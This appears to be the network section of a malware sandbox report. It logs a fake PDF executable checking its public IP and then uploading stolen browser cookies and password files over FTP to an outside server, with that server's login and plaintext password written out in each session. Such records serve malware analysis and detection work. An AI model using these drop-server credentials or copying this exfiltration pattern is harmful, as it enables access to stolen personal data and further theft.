                              Sep 25, 2024 14:46:11.649032116 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.649059057 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.649116993 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.733412981 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:12.597202063 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:12.717811108 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:13.977505922 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:14.009562969 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:14.397054911 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:14.397623062 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:14.402712107 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:14.402786016 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:14.402879953 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:14.408317089 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.331830978 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.333569050 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.339924097 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.339991093 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340004921 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340091944 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.340500116 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340514898 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340527058 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340538979 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340553045 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340565920 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340579987 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340639114 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.341074944 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.346107960 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346606016 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346652985 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346663952 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346678019 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346690893 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346697092 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346703053 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346756935 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.346839905 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346853971 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346863985 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.346920013 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.347131014 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.347141981 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.347148895 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.347254992 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.354046106 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354101896 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354115963 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354630947 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354640961 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354645014 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354649067 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354652882 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354656935 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354846954 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355029106 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355041027 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355047941 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355053902 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355061054 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355746031 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355756044 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355760098 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355904102 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.421375036 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:16.296406031 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:16.420926094 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:33.817956924 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:33.822963953 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:33.865015984 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:33.869863033 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:33.869962931 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.410547972 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.447510958 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.447932959 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.447945118 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.447998047 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.449338913 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.453737974 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.453802109 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.453856945 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.459418058 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.841181993 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.841605902 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.849596977 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.849666119 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.849772930 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.857817888 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.398848057 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.399091959 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.409225941 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409238100 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409245968 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409255981 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409265041 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409297943 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.409341097 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.409374952 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409387112 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409399033 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409415960 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.409430981 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.409449100 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.417926073 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.417938948 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.417980909 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.417999983 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.418556929 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.418566942 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.418576002 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.418615103 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.418636084 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.418688059 CEST5768765052110.4.45.197192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 14:42:22.750097990 CEST | 63915 | 53 | 192.168.2.9 | 1.1.1.1
Sep 25, 2024 14:42:22.758646011 CEST | 53 | 63915 | 1.1.1.1 | 192.168.2.9
Sep 25, 2024 14:42:25.345156908 CEST | 65287 | 53 | 192.168.2.9 | 1.1.1.1
Sep 25, 2024 14:42:25.602282047 CEST | 53 | 65287 | 1.1.1.1 | 192.168.2.9
Sep 25, 2024 14:42:39.789267063 CEST | 53 | 51681 | 1.1.1.1 | 192.168.2.9
Sep 25, 2024 14:42:52.602130890 CEST | 53 | 53103 | 1.1.1.1 | 192.168.2.9
Sep 25, 2024 14:43:06.584023952 CEST | 53 | 63937 | 162.159.36.2 | 192.168.2.9
Sep 25, 2024 14:43:07.114942074 CEST | 53 | 55276 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 25, 2024 14:42:22.750097990 CEST | 192.168.2.9 | 1.1.1.1 | 0x29c0 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Sep 25, 2024 14:42:25.345156908 CEST | 192.168.2.9 | 1.1.1.1 | 0xffdd | Standard query (0) | ftp.haliza.com.my | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 25, 2024 14:42:22.758646011 CEST | 1.1.1.1 | 192.168.2.9 | 0x29c0 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 14:42:22.758646011 CEST | 1.1.1.1 | 192.168.2.9 | 0x29c0 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 14:42:22.758646011 CEST | 1.1.1.1 | 192.168.2.9 | 0x29c0 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 14:42:25.602282047 CEST | 1.1.1.1 | 192.168.2.9 | 0xffdd | No error (0) | ftp.haliza.com.my | | 110.4.45.197 | A (IP address) | IN (0x0001) | false
                              • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49709 | 172.67.74.152 | 443 | 8096 | C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 12:42:23 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-09-25 12:42:24 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 12:42:23 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8c8b180bcc8a0ce9-EWR
2024-09-25 12:42:24 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49714 | 172.67.74.152 | 443 | 764 | C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 12:42:29 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-09-25 12:42:29 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 12:42:29 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8c8b182d19de42fd-EWR
2024-09-25 12:42:29 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49720 | 172.67.74.152 | 443 | 3236 | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 12:42:36 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-09-25 12:42:36 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 12:42:36 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8c8b1857b9ae420a-EWR
2024-09-25 12:42:36 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 55429 | 172.67.74.152 | 443 | 4216 | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 12:42:43 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-09-25 12:42:43 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 12:42:43 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8c8b18875d5b726e-EWR
2024-09-25 12:42:43 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Sep 25, 2024 14:42:26.554580927 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 26 of 50 allowed.
    220-Local time is now 20:42. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Sep 25, 2024 14:42:26.554840088 CEST | 49712 | 21 | 192.168.2.9 | 110.4.45.197 | USER origin@haliza.com.my
Sep 25, 2024 14:42:26.904500961 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 331 User origin@haliza.com.my OK. Password required
Sep 25, 2024 14:42:26.943182945 CEST | 49712 | 21 | 192.168.2.9 | 110.4.45.197 | PASS JesusChrist007$
Sep 25, 2024 14:42:27.321655989 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 230 OK. Current restricted directory is /
Sep 25, 2024 14:42:27.661900043 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 504 Unknown command
Sep 25, 2024 14:42:27.662194014 CEST | 49712 | 21 | 192.168.2.9 | 110.4.45.197 | PWD
Sep 25, 2024 14:42:28.006783962 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 257 "/" is your current location
Sep 25, 2024 14:42:28.006975889 CEST | 49712 | 21 | 192.168.2.9 | 110.4.45.197 | TYPE I
Sep 25, 2024 14:42:28.360621929 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 200 TYPE is now 8-bit binary
Sep 25, 2024 14:42:28.360764980 CEST | 49712 | 21 | 192.168.2.9 | 110.4.45.197 | PASV
Sep 25, 2024 14:42:28.715434074 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 227 Entering Passive Mode (110,4,45,197,212,212)
Sep 25, 2024 14:42:28.723539114 CEST | 49712 | 21 | 192.168.2.9 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-878411_2024_09_25_09_02_24.txt
Sep 25, 2024 14:42:29.608680964 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 150 Accepted data connection
Sep 25, 2024 14:42:29.968885899 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 226-File successfully transferred
    226 0.359 seconds (measured here), 0.79 Kbytes per second
Sep 25, 2024 14:42:29.973295927 CEST | 49712 | 21 | 192.168.2.9 | 110.4.45.197 | PASV
Sep 25, 2024 14:42:30.320218086 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 227 Entering Passive Mode (110,4,45,197,235,243)
Sep 25, 2024 14:42:30.328476906 CEST | 49712 | 21 | 192.168.2.9 | 110.4.45.197 | STOR CO_Edge Chromium_Default.txt_user-878411_2024_09_25_15_01_02.txt
Sep 25, 2024 14:42:31.384186983 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 150 Accepted data connection
Sep 25, 2024 14:42:31.390208006 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 150 Accepted data connection
Sep 25, 2024 14:42:31.635230064 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 25 of 50 allowed.
    220-Local time is now 20:42. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Sep 25, 2024 14:42:31.635566950 CEST | 49717 | 21 | 192.168.2.9 | 110.4.45.197 | USER origin@haliza.com.my
Sep 25, 2024 14:42:31.731142998 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 226 File successfully transferred
Sep 25, 2024 14:42:31.731556892 CEST | 49712 | 21 | 192.168.2.9 | 110.4.45.197 | PASV
Sep 25, 2024 14:42:31.962534904 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 331 User origin@haliza.com.my OK. Password required
Sep 25, 2024 14:42:31.963149071 CEST | 49717 | 21 | 192.168.2.9 | 110.4.45.197 | PASS JesusChrist007$
Sep 25, 2024 14:42:32.075933933 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 227 Entering Passive Mode (110,4,45,197,218,21)
Sep 25, 2024 14:42:32.089035034 CEST | 49712 | 21 | 192.168.2.9 | 110.4.45.197 | STOR CO_Firefox_3nxxd8pi.default-release.txt_user-878411_2024_09_25_17_29_42.txt
Sep 25, 2024 14:42:32.325310946 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 230 OK. Current restricted directory is /
Sep 25, 2024 14:42:32.652662992 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 504 Unknown command
Sep 25, 2024 14:42:32.657428026 CEST | 49717 | 21 | 192.168.2.9 | 110.4.45.197 | PWD
Sep 25, 2024 14:42:32.911660910 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 150 Accepted data connection
Sep 25, 2024 14:42:32.986711025 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 257 "/" is your current location
Sep 25, 2024 14:42:32.986973047 CEST | 49717 | 21 | 192.168.2.9 | 110.4.45.197 | TYPE I
Sep 25, 2024 14:42:33.239876032 CEST | 21 | 49712 | 110.4.45.197 | 192.168.2.9 | 226 File successfully transferred
Sep 25, 2024 14:42:33.316895962 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 200 TYPE is now 8-bit binary
Sep 25, 2024 14:42:33.449080944 CEST | 49717 | 21 | 192.168.2.9 | 110.4.45.197 | PASV
Sep 25, 2024 14:42:33.778009892 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 227 Entering Passive Mode (110,4,45,197,226,153)
Sep 25, 2024 14:42:33.783690929 CEST | 49717 | 21 | 192.168.2.9 | 110.4.45.197 | STOR PW_user-878411_2024_09_25_08_42_29.html
Sep 25, 2024 14:42:34.626370907 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 150 Accepted data connection
Sep 25, 2024 14:42:35.034544945 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 226-File successfully transferred
    226 0.334 seconds (measured here), 1.01 Kbytes per second
Sep 25, 2024 14:42:35.070092916 CEST | 49717 | 21 | 192.168.2.9 | 110.4.45.197 | PASV
Sep 25, 2024 14:42:35.450246096 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 227 Entering Passive Mode (110,4,45,197,247,57)
Sep 25, 2024 14:42:36.071222067 CEST | 49717 | 21 | 192.168.2.9 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-878411_2024_09_25_14_11_25.txt
Sep 25, 2024 14:42:36.928812981 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 150 Accepted data connection
Sep 25, 2024 14:42:37.270031929 CEST | 21 | 49717 | 110.4.45.197 | 192.168.2.9 | 226-File successfully transferred
    226 0.340 seconds (measured here), 0.83 Kbytes per second
Sep 25, 2024 14:42:37.270481110 CEST | 49717 | 21 | 192.168.2.9 | 110.4.45.197 | PASV
                              Sep 25, 2024 14:42:37.583060980 CEST  21  49723  110.4.45.197  192.168.2.9  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220-You are user number 23 of 50 allowed.
                              220-Local time is now 20:42. Server port: 21.
                              220-This is a private system - No anonymous login
                              220-IPv6 connections are also welcome on this server.
                              220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:42:37.583281040 CEST  49723  21  192.168.2.9  110.4.45.197  USER origin@haliza.com.my
                              Sep 25, 2024 14:42:37.601094007 CEST  21  49717  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,223,0)
                              Sep 25, 2024 14:42:37.606585979 CEST  49717  21  192.168.2.9  110.4.45.197  STOR CO_Edge Chromium_Default.txt_user-878411_2024_09_25_16_20_15.txt
                              Sep 25, 2024 14:42:37.912306070 CEST  21  49723  110.4.45.197  192.168.2.9  331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:42:37.912535906 CEST  49723  21  192.168.2.9  110.4.45.197  PASS JesusChrist007$
                              Sep 25, 2024 14:42:38.265619040 CEST  21  49723  110.4.45.197  192.168.2.9  230 OK. Current restricted directory is /
                              Sep 25, 2024 14:42:38.431421041 CEST  21  49717  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:42:38.591711998 CEST  21  49723  110.4.45.197  192.168.2.9  504 Unknown command
                              Sep 25, 2024 14:42:38.592644930 CEST  49723  21  192.168.2.9  110.4.45.197  PWD
                              Sep 25, 2024 14:42:38.783453941 CEST  21  49717  110.4.45.197  192.168.2.9  226 File successfully transferred
                              Sep 25, 2024 14:42:38.785008907 CEST  49717  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:42:38.938766003 CEST  21  49723  110.4.45.197  192.168.2.9  257 "/" is your current location
                              Sep 25, 2024 14:42:38.939066887 CEST  49723  21  192.168.2.9  110.4.45.197  TYPE I
                              Sep 25, 2024 14:42:39.112016916 CEST  21  49717  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,214,107)
                              Sep 25, 2024 14:42:39.124619007 CEST  49717  21  192.168.2.9  110.4.45.197  STOR CO_Firefox_3nxxd8pi.default-release.txt_user-878411_2024_09_25_18_08_59.txt
                              Sep 25, 2024 14:42:39.267407894 CEST  21  49723  110.4.45.197  192.168.2.9  200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:42:39.267564058 CEST  49723  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:42:39.594686031 CEST  21  49723  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,208,16)
                              Sep 25, 2024 14:42:39.600522995 CEST  49723  21  192.168.2.9  110.4.45.197  STOR PW_user-878411_2024_09_25_08_42_35.html
                              Sep 25, 2024 14:42:39.956085920 CEST  21  49717  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:42:40.285213947 CEST  21  49717  110.4.45.197  192.168.2.9  226 File successfully transferred
                              Sep 25, 2024 14:42:40.450242043 CEST  21  49723  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:42:40.790472984 CEST  21  49723  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.340 seconds (measured here), 0.99 Kbytes per second
                              Sep 25, 2024 14:42:40.825231075 CEST  49723  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:42:41.153971910 CEST  21  49723  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,219,125)
                              Sep 25, 2024 14:42:41.208826065 CEST  49723  21  192.168.2.9  110.4.45.197  STOR CO_Chrome_Default.txt_user-878411_2024_09_25_14_21_28.txt
                              Sep 25, 2024 14:42:42.020953894 CEST  21  49723  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:42:42.350935936 CEST  21  49723  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.330 seconds (measured here), 0.86 Kbytes per second
                              Sep 25, 2024 14:42:42.351356030 CEST  49723  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:42:42.679596901 CEST  21  49723  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,254,20)
                              Sep 25, 2024 14:42:42.685287952 CEST  49723  21  192.168.2.9  110.4.45.197  STOR CO_Edge Chromium_Default.txt_user-878411_2024_09_25_16_10_37.txt
                              Sep 25, 2024 14:42:43.585841894 CEST  21  49723  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:42:45.758148909 CEST  21  55430  110.4.45.197  192.168.2.9  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220-You are user number 23 of 50 allowed.
                              220-Local time is now 20:42. Server port: 21.
                              220-This is a private system - No anonymous login
                              220-IPv6 connections are also welcome on this server.
                              220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:42:45.762273073 CEST  55430  21  192.168.2.9  110.4.45.197  USER origin@haliza.com.my
                              Sep 25, 2024 14:42:46.101133108 CEST  21  55430  110.4.45.197  192.168.2.9  331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:42:46.104639053 CEST  55430  21  192.168.2.9  110.4.45.197  PASS JesusChrist007$
                              Sep 25, 2024 14:42:46.459978104 CEST  21  55430  110.4.45.197  192.168.2.9  230 OK. Current restricted directory is /
                              Sep 25, 2024 14:42:46.799571037 CEST  21  55430  110.4.45.197  192.168.2.9  504 Unknown command
                              Sep 25, 2024 14:42:46.804580927 CEST  55430  21  192.168.2.9  110.4.45.197  PWD
                              Sep 25, 2024 14:42:47.144850016 CEST  21  55430  110.4.45.197  192.168.2.9  257 "/" is your current location
                              Sep 25, 2024 14:42:47.145196915 CEST  55430  21  192.168.2.9  110.4.45.197  TYPE I
                              Sep 25, 2024 14:42:47.487152100 CEST  21  55430  110.4.45.197  192.168.2.9  200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:42:47.487413883 CEST  55430  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:42:47.994132996 CEST  21  55430  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,213,11)
                              Sep 25, 2024 14:42:48.223854065 CEST  21  55430  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,213,11)
                              Sep 25, 2024 14:42:48.225577116 CEST  55430  21  192.168.2.9  110.4.45.197  STOR PW_user-878411_2024_09_25_08_42_43.html
                              Sep 25, 2024 14:42:49.076314926 CEST  21  55430  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:42:49.412595034 CEST  21  55430  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.335 seconds (measured here), 1.00 Kbytes per second
